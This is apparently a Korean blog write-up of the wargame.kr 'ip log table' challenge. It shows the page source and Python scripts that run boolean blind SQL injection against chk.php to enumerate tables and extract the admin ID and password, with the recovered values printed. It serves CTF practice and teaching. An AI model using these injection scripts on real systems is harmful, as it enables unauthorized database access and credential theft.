반응형
ip log table
Blind SQLi challenge.
You can use 'Ascii' to 'Date'
.
페이지 소스
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
<style>
#mv_admin {cursor:hand; font-family:verdana; padding:10px; font-weight:bold;}
td{text-align:center; height:30px;}
.menu {background-color:#163; color:#fab;}
.menu td{font-weight:bold;}
.list td{text-align:center; cursor:hand;}
</style>
<script src="./jquery.min.js"></script>
<script> var f;
function ov(){ this.style.color="#11f"; this.style.background="#ff0"; this.style.fontWeight="bold";}
function ou(){ this.style.color="#000"; this.style.background="#fff"; this.style.fontWeight="normal";}
function mv(){ f.idx.value=this.id; f.submit(); }
function init(){
a=document.getElementById("mv_admin");
a.onmouseover=ov; a.onmouseout=ou; a.onclick=function(){window.location='admin.php';}
f=document.getElementById("f"); iplist=$(".list");
for(i=0;i<iplist.length;i++){
iplist[i].onmouseover=ov; iplist[i].onmouseout=ou; iplist[i].onclick=mv;
}
}
</script>
<body onload="init();">
<center>
<h1>ACCESS IP LOG TABLE</h1>
<hr /><div id="mv_admin">[+] admin login [+]</div><hr />
<table border=1 width=550 align=center>
<tr class='menu'><td>idx</td><td>IP address</td></tr>
.
.
.
.
</table>
</center>
<form id="f" method="post" action="chk.php">
<input type="hidden" name="idx" value="blueh4g">
</form>
</body>
|
cs |
소스를 보면, 행을 클릭했을 때 chk.php에 해당 id값을 post로 보내서 값을 받는다.
스크립트를 짜서 확인해보자
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
import urllib
import urllib2
import re
url = "http://wargame.kr:8080/ip_log_table/chk.php"
opener = urllib2.build_opener(urllib2.HTTPHandler)
data = {"idx":"39749 and 1=0#"}
data = urllib.urlencode(data)
request = urllib2.Request(url, data)
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
request.add_header('Cookie', 'PHPSESSID=cookie')
data = opener.open(request)
data = data.read()
print data
|
cs |
39748 and 1=1 => TRUE => IP log time : 2020-01-01 17:43:20
39748 and 1=0 => FLASE => IP log time : 1970-01-01 09:00:00
이 것을 이용해서 blind sqli를 하면 된다.
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
|
import urllib
import urllib2
import sys
import time
key = ""
def chk(payload):
url = "http://wargame.kr:8080/ip_log_table/chk.php"
opener = urllib2.build_opener(urllib2.HTTPHandler)
data = {"idx": payload}
data = urllib.urlencode(data)
request = urllib2.Request(url, data)
request.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36')
data = opener.open(request)
data = data.read()
print(payload)
print data
return data
'''
for i in range(70,100):
payload = "39749 and (select count(*) from information_schema.tables)="+str(i)
if not "1970-01-01 09:00:00" in chk(payload):
key += str(i)
print "[*] " +key
break
else:
print "[-] Fail!"
time.sleep(0.1)
'''
#result : 72
'''
for i in range(15):
for j in range(33,127):
payload = "39749 and ord(substring((select table_name from information_schema.tables limit 71,1),"+str(i+1)+",1))="+str(j)+"#"
print chr(j)
if not "1970-01-01 09:00:00" in chk(payload):
key += chr(j)
print "[*] " +key
break
else:
print "[-] Fail!"
time.sleep(0.1)
'''
#result : ip_table
'''
for i in range(15):
for j in range(33,127):
payload = "39749 and ord(substring((select table_name from information_schema.tables limit 70,1),"+str(i+1)+",1))="+str(j)+"#"
print chr(j)
if not "1970-01-01 09:00:00" in chk(payload):
key += chr(j)
print "[*] " +key
break
else:
print "[-] Fail!"
time.sleep(0.1)
'''
#result : admin_table
'''
for i in range(5):
for j in range(33,127):
payload = "39749 and ord(substring((select id from admin_table),"+str(i+1)+",1))="+str(j)+"#"
print chr(j)
if not "1970-01-01 09:00:00" in chk(payload):
key += chr(j)
print "[*] " +key
break
else:
print "[-] Fail!"
time.sleep(0.1)
'''
#result : blue_admin
'''
for i in range(5):
for j in range(33,127):
payload = "39749 and ord(substring((select ps from admin_table),"+str(i+1)+",1))="+str(j)+"#"
print chr(j)
if not "1970-01-01 09:00:00" in chk(payload):
key += chr(j)
print "[*] " +key
break
else:
print "[-] Fail!"
time.sleep(0.1)
'''
#result : 0h~myp4ss!
|
cs |
칼럼개수가 너무 많아서 칼럼명을 찾기가 힘들다.
로그인 페이지에 있는 id와 ps를 그대로 칼럼명으로 썼더니 됐다.
얻은 id와 pw로 로그인을 하면 된다.
반응형
'WAR GAME > wargame.kr' 카테고리의 다른 글
| Wargame.kr [lonely guys] 풀이 (0) | 2020.01.06 |
|---|---|
| Wargame.kr [keypad CrackMe] 풀이 (0) | 2020.01.06 |
| Wargame.kr [SimpleBoard] 풀이 (0) | 2020.01.04 |
| Wargame.kr [pyc decompile] 풀이 (0) | 2020.01.04 |
| Wargame.kr [web chatting] 풀이 (0) | 2020.01.01 |